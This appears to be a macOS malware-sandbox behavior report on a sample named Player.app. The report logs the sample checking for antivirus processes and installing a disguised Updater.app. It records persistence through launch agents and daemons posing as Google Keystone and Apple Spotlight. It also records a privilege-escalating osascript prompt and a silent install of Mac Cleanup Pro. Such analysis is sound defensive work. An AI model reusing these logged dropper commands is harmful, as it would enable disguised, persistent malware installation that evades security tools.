Source: /bin/sh (PID: 785)	Shell process: mv /tmp/com.google.keystone.plist /Library/LaunchDaemons	Jump to behavior
Source: /bin/sh (PID: 786)	Shell process: launchctl load -w /Library/LaunchDaemons/com.google.keystone.plist	Jump to behavior
Source: /bin/sh (PID: 789)	Shell process: mkdir /Users/henry/Library/com.apple.spotlight.Core	Jump to behavior
Source: /bin/sh (PID: 790)	Shell process: mv /tmp/ddd/Updater.app /Users/henry/Library/com.apple.spotlight.Core	Jump to behavior
Source: /bin/sh (PID: 791)	Shell process: mv /tmp/com.google.keystone.plist /Users/henry/Library/LaunchAgents	Jump to behavior
Source: /bin/sh (PID: 792)	Shell process: touch /Users/henry/Library/com.apple.spotlight.Core/dax	Jump to behavior
Source: /bin/sh (PID: 793)	Shell process: launchctl load -w /Users/henry/Library/LaunchAgents/com.google.keystone.plist	Jump to behavior
Source: /bin/sh (PID: 796)	Shell process: hdiutil attach /Users/henry/Downloads/mcp_mcpcnsppi.dmg	Jump to behavior
Source: /bin/sh (PID: 806)	Shell process: cp -R /Volumes/MacCleanupPro/Mac Cleanup Pro.app /Applications	Jump to behavior
Source: /bin/sh (PID: 808)	Shell process: open /Applications/Mac Cleanup Pro.app	Jump to behavior
Source: /bin/sh (PID: 810)	Shell process: open /Applications/Mac Cleanup Pro.app	Jump to behavior
Source: /bin/sh (PID: 811)	Shell process: hdiutil detach /Volumes/MacCleanupPro	Jump to behavior
Source: /bin/sh (PID: 813)	Shell process: rm -R /Users/henry/Downloads/mcp_mcpcnsppi.dmg	Jump to behavior

Queries for attached disk images with shell command 'hdiutil'

Show sources

Source: /bin/sh (PID: 751)

Hdiutil command executed: hdiutil info

Jump to behavior

Writes Mach-O files to untypical directories

Show sources

Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)	64-bit Mach-O written to unusual path: /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/MacOS/helpermcp	Jump to dropped file
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)	64-bit Mach-O written to unusual path: /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/Resources/mcpupdater.app/Contents/MacOS/mcpupdater	Jump to dropped file
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)	64-bit Mach-O written to unusual path: /Users/henry/Library/Application Support/mcp/mcpuninstall.app/Contents/MacOS/mcpuninstall	Jump to dropped file
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)	64-bit Mach-O written to unusual path: /Users/henry/Library/Application Support/mcp/mcpuninstall.app/Contents/Resources/mcpuninstallhelper.app/Contents/MacOS/mcpuninstallhelper	Jump to dropped file

Changes permissions of written Mach-O files

Show sources

Source: /usr/bin/unzip (PID: 776)	Permissions modified for written 64-bit Mach-O /private/tmp/ddd/Updater.app/Contents/MacOS/Updater: bits: - usr: rx grp: rx all: rwx	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	Permissions modified for written 64-bit Mach-O /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftAppKit.dylib: bits: - usr: rx grp: rx all: rwx	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	Permissions modified for written 64-bit Mach-O /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftCoreImage.dylib: bits: - usr: rx grp: rx all: rwx	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	Permissions modified for written 64-bit Mach-O /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftObjectiveC.dylib: bits: - usr: rx grp: rx all: rwx	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	Permissions modified for written 64-bit Mach-O /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftXPC.dylib: bits: - usr: rx grp: rx all: rwx	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	Permissions modified for written 64-bit Mach-O /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftSafariServices.dylib: bits: - usr: rx grp: rx all: rwx	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	Permissions modified for written 64-bit Mach-O /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftCore.dylib: bits: - usr: rx grp: rx all: rwx	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	Permissions modified for written 64-bit Mach-O /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftCoreGraphics.dylib: bits: - usr: rx grp: rx all: rwx	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	Permissions modified for written 64-bit Mach-O /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftMetal.dylib: bits: - usr: rx grp: rx all: rwx	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	Permissions modified for written 64-bit Mach-O /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftCoreData.dylib: bits: - usr: rx grp: rx all: rwx	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	Permissions modified for written 64-bit Mach-O /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftDispatch.dylib: bits: - usr: rx grp: rx all: rwx	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	Permissions modified for written 64-bit Mach-O /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftos.dylib: bits: - usr: rx grp: rx all: rwx	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	Permissions modified for written 64-bit Mach-O /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftCoreFoundation.dylib: bits: - usr: rx grp: rx all: rwx	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	Permissions modified for written 64-bit Mach-O /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftDarwin.dylib: bits: - usr: rx grp: rx all: rwx	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	Permissions modified for written 64-bit Mach-O /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftQuartzCore.dylib: bits: - usr: rx grp: rx all: rwx	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	Permissions modified for written 64-bit Mach-O /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftIOKit.dylib: bits: - usr: rx grp: rx all: rwx	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	Permissions modified for written 64-bit Mach-O /private/tmp/ddd/Updater.app/Contents/Frameworks/Alamofire.framework/Versions/A/Alamofire: bits: - usr: rx grp: rx all: rwx	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	Permissions modified for written 64-bit Mach-O /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftFoundation.dylib: bits: - usr: rx grp: rx all: rwx	Jump to dropped file
Source: /bin/cp (PID: 806)	Permissions modified for written 64-bit Mach-O /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/MacOS/Autoupdate: bits: - usr: rx grp: rx all: rwx	Jump to dropped file
Source: /bin/cp (PID: 806)	Permissions modified for written 64-bit Mach-O /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/MacOS/fileop: bits: - usr: rx grp: rx all: rwx	Jump to dropped file
Source: /bin/cp (PID: 806)	Permissions modified for written 64-bit Mach-O /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Sparkle: bits: - usr: rx grp: rx all: rwx	Jump to dropped file
Source: /bin/cp (PID: 806)	Permissions modified for written 64-bit Mach-O /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro: bits: - usr: rx grp: rx all: rwx	Jump to dropped file
Source: /bin/cp (PID: 806)	Permissions modified for written 64-bit Mach-O /Applications/Mac Cleanup Pro.app/Contents/Resources/helpermcp.app/Contents/MacOS/helpermcp: bits: - usr: rx grp: rx all: rwx	Jump to dropped file
Source: /bin/cp (PID: 806)	Permissions modified for written 64-bit Mach-O /Applications/Mac Cleanup Pro.app/Contents/Resources/helpermcp.app/Contents/Resources/mcpupdater.app/Contents/MacOS/mcpupdater: bits: - usr: rx grp: rx all: rwx	Jump to dropped file
Source: /bin/cp (PID: 806)	Permissions modified for written 64-bit Mach-O /Applications/Mac Cleanup Pro.app/Contents/Resources/mcpuninstall.app/Contents/MacOS/mcpuninstall: bits: - usr: rx grp: rx all: rwx	Jump to dropped file
Source: /bin/cp (PID: 806)	Permissions modified for written 64-bit Mach-O /Applications/Mac Cleanup Pro.app/Contents/Resources/mcpuninstall.app/Contents/Resources/mcpuninstallhelper.app/Contents/MacOS/mcpuninstallhelper: bits: - usr: rx grp: rx all: rwx	Jump to dropped file
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)	Permissions modified for written 64-bit Mach-O /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/MacOS/helpermcp: bits: - usr: rx grp: rx all: rwx	Jump to dropped file
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)	Permissions modified for written 64-bit Mach-O /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/Resources/mcpupdater.app/Contents/MacOS/mcpupdater: bits: - usr: rx grp: rx all: rwx	Jump to dropped file
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)	Permissions modified for written 64-bit Mach-O /Users/henry/Library/Application Support/mcp/mcpuninstall.app/Contents/MacOS/mcpuninstall: bits: - usr: rx grp: rx all: rwx	Jump to dropped file
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)	Permissions modified for written 64-bit Mach-O /Users/henry/Library/Application Support/mcp/mcpuninstall.app/Contents/Resources/mcpuninstallhelper.app/Contents/MacOS/mcpuninstallhelper: bits: - usr: rx grp: rx all: rwx	Jump to dropped file

Creates application bundles

Show sources

Source: /usr/bin/unzip (PID: 776)	Bundle Info.plist file created: /tmp/ddd/Updater.app/Contents/Info.plist	Jump to behavior
Source: /bin/cp (PID: 806)	Bundle Info.plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Info.plist	Jump to behavior
Source: /bin/cp (PID: 806)	Bundle Info.plist file created: /Applications/Mac Cleanup Pro.app/Contents/Info.plist	Jump to behavior
Source: /bin/cp (PID: 806)	Bundle Info.plist file created: /Applications/Mac Cleanup Pro.app/Contents/Resources/helpermcp.app/Contents/Info.plist	Jump to behavior
Source: /bin/cp (PID: 806)	Bundle Info.plist file created: /Applications/Mac Cleanup Pro.app/Contents/Resources/helpermcp.app/Contents/Resources/mcpupdater.app/Contents/Info.plist	Jump to behavior
Source: /bin/cp (PID: 806)	Bundle Info.plist file created: /Applications/Mac Cleanup Pro.app/Contents/Resources/mcpuninstall.app/Contents/Info.plist	Jump to behavior
Source: /bin/cp (PID: 806)	Bundle Info.plist file created: /Applications/Mac Cleanup Pro.app/Contents/Resources/mcpuninstall.app/Contents/Resources/mcpuninstallhelper.app/Contents/Info.plist	Jump to behavior

Creates code signed application bundles

Show sources

Source: /usr/bin/unzip (PID: 776)	Bundle code signature resource file created: /tmp/ddd/Updater.app/Contents/_CodeSignature/CodeResources	Jump to behavior
Source: /bin/cp (PID: 806)	Bundle code signature resource file created: /Applications/Mac Cleanup Pro.app/Contents/_CodeSignature/CodeResources	Jump to behavior
Source: /bin/cp (PID: 806)	Bundle code signature resource file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/_CodeSignature/CodeResources	Jump to behavior
Source: /bin/cp (PID: 806)	Bundle code signature resource file created: /Applications/Mac Cleanup Pro.app/Contents/Resources/helpermcp.app/Contents/_CodeSignature/CodeResources	Jump to behavior
Source: /bin/cp (PID: 806)	Bundle code signature resource file created: /Applications/Mac Cleanup Pro.app/Contents/Resources/helpermcp.app/Contents/Resources/mcpupdater.app/Contents/_CodeSignature/CodeResources	Jump to behavior
Source: /bin/cp (PID: 806)	Bundle code signature resource file created: /Applications/Mac Cleanup Pro.app/Contents/Resources/mcpuninstall.app/Contents/_CodeSignature/CodeResources	Jump to behavior
Source: /bin/cp (PID: 806)	Bundle code signature resource file created: /Applications/Mac Cleanup Pro.app/Contents/Resources/mcpuninstall.app/Contents/Resources/mcpuninstallhelper.app/Contents/_CodeSignature/CodeResources	Jump to behavior

Creates hidden files, links and/or directories

Show sources

Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Hidden file created: /Users/henry/Library/LaunchAgents/.dat.nosync02ed.9K4WCN	Jump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Hidden file created: /Users/henry/Library/LaunchAgents/.dat.nosync02ed.vRm7qL	Jump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Hidden file created: /Users/henry/Library/Application Support/com.l.r.l.m/com.crashlytics/.dat.nosync02ed.j46nBn	Jump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Hidden file created: /Users/henry/Library/Caches/com.crashlytics.data/com.l.r.l.m/analytics/v2/.dat.nosync02ed.deTIpE	Jump to behavior
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)	Hidden file created: /Users/henry/Library/LaunchAgents/.dat.nosync0329.fxxEQW	Jump to behavior
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)	Hidden file created: /Users/henry/Library/Mac Cleanup Pro/.dat.nosync0329.viSV3i	Jump to behavior
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)	Hidden file created: /Users/henry/Library/Mac Cleanup Pro/.dat.nosync0329.6gv7Xh	Jump to behavior
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)	Hidden file created: /Users/henry/Library/Application Support/mcp/.dat.nosync0329.hbaIKo	Jump to behavior

Creates launch services that start periodically

Show sources

Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Launch agent/daemon created with StartInterval and/or StartCalendarInterval, file moved: /Users/henry/Library/LaunchAgents/.dat.nosync02ed.vRm7qL -> /Users/henry/Library/LaunchAgents/com.google.keystone.plist			Jump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Launch agent/daemon created with StartInterval and/or StartCalendarInterval, file moved: /Users/henry/Library/LaunchAgents/.dat.nosync02ed.9K4WCN -> /Users/henry/Library/LaunchAgents/com.google.keystone.plist			Jump to behavior

Executes Apple scripts and/or other OSA language scripts with shell command 'osascript'

Show sources

Source: /bin/sh (PID: 778)

Osascript command executed: osascript -e do shell script 'mkdir \'/Library/Application Support/com.apple.spotlight.Core\' mv /tmp/ddd/Updater.app \'/Library/Application Support/com.apple.spotlight.Core\' mv /tmp/com.google.keystone.plist /Library/LaunchDaemons launchctl load -w /Library/LaunchDaemons/com.google.keystone.plist echo Passed' with administrator privileges

Jump to behavior

Executes commands using a shell command-line interpreter

Show sources

Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Shell command executed: /bin/sh -c hdiutil info \| grep -e image-path	Jump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Shell command executed: /bin/sh -c pgrep -f -i bitdefender	Jump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Shell command executed: /bin/sh -c pgrep -f -i intego	Jump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Shell command executed: /bin/sh -c pgrep -f -i kaspersky	Jump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Shell command executed: /bin/sh -c pgrep -f -i norton	Jump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Shell command executed: /bin/sh -c pgrep -f -i trend micro	Jump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Shell command executed: /bin/sh -c pgrep -f -i clamxav	Jump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Shell command executed: /bin/sh -c pgrep -f -i eset	Jump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Shell command executed: /bin/sh -c pgrep -f -i f-secure	Jump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Shell command executed: /bin/sh -c pgrep -f -i avast	Jump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Shell command executed: /bin/sh -c pgrep -f -i avira	Jump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Shell command executed: /bin/sh -c pgrep -f -i malwarebytes	Jump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Shell command executed: /bin/sh -c pgrep -f -i sophos	Jump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Shell command executed: /bin/sh -c pgrep -f -i zap	Jump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Shell command executed: /bin/sh -c pgrep -f -i total av	Jump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Shell command executed: /bin/sh -c pgrep -f -i bullguard	Jump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Shell command executed: /bin/sh -c pgrep -f -i panda	Jump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Shell command executed: /bin/sh -c pgrep -f -i avg	Jump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Shell command executed: /bin/sh -c pgrep -f -i webroot	Jump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Shell command executed: /bin/sh -c ioreg -l \| grep -e Manufacturer	Jump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Shell command executed: /bin/sh -c mkdir /tmp/ddd	Jump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Shell command executed: /bin/sh -c unzip -o /tmp/Updater.zip -d /tmp/ddd	Jump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Shell command executed: /bin/sh -c rm -rf /tmp/Updater.zip	Jump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Shell command executed: /bin/sh -c osascript -e 'do shell script 'mkdir \'/Library/Application Support/com.apple.spotlight.Core\' mv /tmp/ddd/Updater.app \'/Library/Application Support/com.apple.spotlight.Core\' mv /tmp/com.google.keystone.plist /Library/LaunchDaemons launchctl load -w /Library/LaunchDaemons/com.google.keystone.plist echo Passed' with administrator privileges'	Jump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Shell command executed: /bin/sh -c main_dir_name='com.apple.spotlight.Core' app_name='Updater.app' plist_name='com.google.keystone.plist' mkdir $HOME/Library/$main_dir_name mv /tmp/ddd/$app_name $HOME/Library/$main_dir_name mv /tmp/$plist_name $HOME/Library/LaunchAgents touch $HOME/Library/$main_dir_name/dax launchctl load -w $HOME/Library/LaunchAgents/$plist_name	Jump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Shell command executed: /bin/sh -c hdiutil attach /Users/henry/Downloads/mcp_mcpcnsppi.dmg	Jump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Shell command executed: /bin/sh -c cp -R '/Volumes/MacCleanupPro/Mac Cleanup Pro.app' /Applications	Jump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Shell command executed: /bin/sh -c open '/Applications/Mac Cleanup Pro.app'	Jump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Shell command executed: /bin/sh -c open '/Applications/Mac Cleanup Pro.app'	Jump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Shell command executed: /bin/sh -c hdiutil detach '/Volumes/MacCleanupPro'	Jump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Shell command executed: /bin/sh -c rm -R /Users/henry/Downloads/mcp_mcpcnsppi.dmg	Jump to behavior
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 782)	Shell command executed: /bin/sh -c mkdir '/Library/Application Support/com.apple.spotlight.Core' mv /tmp/ddd/Updater.app '/Library/Application Support/com.apple.spotlight.Core' mv /tmp/com.google.keystone.plist /Library/LaunchDaemons launchctl load -w /Library/LaunchDaemons/com.google.keystone.plist echo Passed	Jump to behavior

Executes the "grep" command used to find patterns in files or piped streams

Show sources

Source: /bin/sh (PID: 752)	Grep executable: /usr/bin/grep -> grep -e image-path			Jump to behavior
Source: /bin/sh (PID: 774)	Grep executable: /usr/bin/grep -> grep -e Manufacturer			Jump to behavior

Executes the "mkdir" command used to create folders

Show sources

Source: /bin/sh (PID: 775)	Mkdir executable: /bin/mkdir -> mkdir /tmp/ddd	Jump to behavior
Source: /bin/sh (PID: 783)	Mkdir executable: /bin/mkdir -> mkdir /Library/Application Support/com.apple.spotlight.Core	Jump to behavior
Source: /bin/sh (PID: 789)	Mkdir executable: /bin/mkdir -> mkdir /Users/henry/Library/com.apple.spotlight.Core	Jump to behavior

Executes the "pgrep" command search for and/or send signals to processes

Show sources

Source: /bin/sh (PID: 754)	Pgrep executable: /usr/bin/pgrep -> pgrep -f -i bitdefender	Jump to behavior
Source: /bin/sh (PID: 755)	Pgrep executable: /usr/bin/pgrep -> pgrep -f -i intego	Jump to behavior
Source: /bin/sh (PID: 756)	Pgrep executable: /usr/bin/pgrep -> pgrep -f -i kaspersky	Jump to behavior
Source: /bin/sh (PID: 757)	Pgrep executable: /usr/bin/pgrep -> pgrep -f -i norton	Jump to behavior
Source: /bin/sh (PID: 758)	Pgrep executable: /usr/bin/pgrep -> pgrep -f -i trend micro	Jump to behavior
Source: /bin/sh (PID: 759)	Pgrep executable: /usr/bin/pgrep -> pgrep -f -i clamxav	Jump to behavior
Source: /bin/sh (PID: 760)	Pgrep executable: /usr/bin/pgrep -> pgrep -f -i eset	Jump to behavior
Source: /bin/sh (PID: 761)	Pgrep executable: /usr/bin/pgrep -> pgrep -f -i f-secure	Jump to behavior
Source: /bin/sh (PID: 762)	Pgrep executable: /usr/bin/pgrep -> pgrep -f -i avast	Jump to behavior
Source: /bin/sh (PID: 763)	Pgrep executable: /usr/bin/pgrep -> pgrep -f -i avira	Jump to behavior
Source: /bin/sh (PID: 764)	Pgrep executable: /usr/bin/pgrep -> pgrep -f -i malwarebytes	Jump to behavior
Source: /bin/sh (PID: 765)	Pgrep executable: /usr/bin/pgrep -> pgrep -f -i sophos	Jump to behavior
Source: /bin/sh (PID: 766)	Pgrep executable: /usr/bin/pgrep -> pgrep -f -i zap	Jump to behavior
Source: /bin/sh (PID: 767)	Pgrep executable: /usr/bin/pgrep -> pgrep -f -i total av	Jump to behavior
Source: /bin/sh (PID: 768)	Pgrep executable: /usr/bin/pgrep -> pgrep -f -i bullguard	Jump to behavior
Source: /bin/sh (PID: 769)	Pgrep executable: /usr/bin/pgrep -> pgrep -f -i panda	Jump to behavior
Source: /bin/sh (PID: 770)	Pgrep executable: /usr/bin/pgrep -> pgrep -f -i avg	Jump to behavior
Source: /bin/sh (PID: 771)	Pgrep executable: /usr/bin/pgrep -> pgrep -f -i webroot	Jump to behavior

Executes the "rm" command used to delete files or directories

Show sources

Source: /bin/sh (PID: 777)	Rm executable: /bin/rm -> rm -rf /tmp/Updater.zip			Jump to behavior
Source: /bin/sh (PID: 813)	Rm executable: /bin/rm -> rm -R /Users/henry/Downloads/mcp_mcpcnsppi.dmg			Jump to behavior

Executes the "security_authtrampoline" command used to authorize execution with root privileges (GUI prompt)

Show sources

Source: /usr/bin/osascript (PID: 782)

Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 11 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c mkdir '/Library/Application Support/com.apple.spotlight.Core' mv /tmp/ddd/Updater.app '/Library/Application Support/com.apple.spotlight.Core' mv /tmp/com.google.keystone.plist /Library/LaunchDaemons launchctl load -w /Library/LaunchDaemons/com.google.keystone.plist echo Passed

Jump to behavior

Executes the "touch" command used to create files or modify time stamps

Show sources

Source: /bin/sh (PID: 792)

Touch executable: /usr/bin/touch -> touch /Users/henry/Library/com.apple.spotlight.Core/dax

Jump to behavior

Explicitly loads/starts launch services

Show sources

Source: /bin/sh (PID: 786)	Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.google.keystone.plist	Jump to behavior
Source: /bin/sh (PID: 793)	Launch agent/daemon loaded: launchctl load -w /Users/henry/Library/LaunchAgents/com.google.keystone.plist	Jump to behavior
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)	Launch agent/daemon loaded: /bin/launchctl load -wF /Users/henry/Library/Application Support/mcp/com.pcv.mcpuninstall.plist	Jump to behavior
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)	Launch agent/daemon loaded: /bin/launchctl load -wF /Users/henry/Library/LaunchAgents/com.pcv.hlprmcp.plist	Jump to behavior

Opens applications that might be created ones

Show sources

Source: /bin/sh (PID: 808)	Application opened: open /Applications/Mac Cleanup Pro.app			Jump to behavior
Source: /bin/sh (PID: 810)	Application opened: open /Applications/Mac Cleanup Pro.app			Jump to behavior

Reads launchservices plist files

Show sources

Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist	Jump to behavior
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist	Jump to behavior
Source: /usr/bin/osascript (PID: 778)	Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist	Jump to behavior
Source: /System/Library/PrivateFrameworks/DiskImages.framework/Resources/diskimages-helper (PID: 799)	Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist	Jump to behavior
Source: /usr/bin/open (PID: 808)	Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist	Jump to behavior
Source: /usr/bin/open (PID: 810)	Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist	Jump to behavior
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)	Launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist	Jump to behavior
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)	Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist	Jump to behavior
Source: /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/MacOS/helpermcp (PID: 821)	Launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Source: /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/MacOS/helpermcp (PID: 821)	Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist

Reads user launchservices plist file containing default apps for corresponding file types

Show sources

Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Preferences launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist	Jump to behavior
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)	Preferences launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist	Jump to behavior
Source: /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/MacOS/helpermcp (PID: 821)	Preferences launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist

Uses AppleScript framework/components containing Apple Script related functionalities

Show sources

Source: /usr/bin/osascript (PID: 778)	AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist			Jump to behavior
Source: /usr/bin/osascript (PID: 778)	AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist			Jump to behavior

Uses AppleScript scripting additions containing additional functionalities for Apple Scripts

Show sources

Source: /usr/bin/osascript (PID: 778)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist			Jump to behavior
Source: /usr/bin/osascript (PID: 778)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist			Jump to behavior

Uses CFNetwork bundle containing interfaces for network communication (HTTP, sockets, and Bonjour)

Show sources

Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	CFNetwork info plist opened: /System/Library/Frameworks/CFNetwork.framework/Resources/Info.plist	Jump to behavior
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)	CFNetwork info plist opened: /System/Library/Frameworks/CFNetwork.framework/Resources/Info.plist	Jump to behavior
Source: /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/MacOS/helpermcp (PID: 821)	CFNetwork info plist opened: /System/Library/Frameworks/CFNetwork.framework/Resources/Info.plist

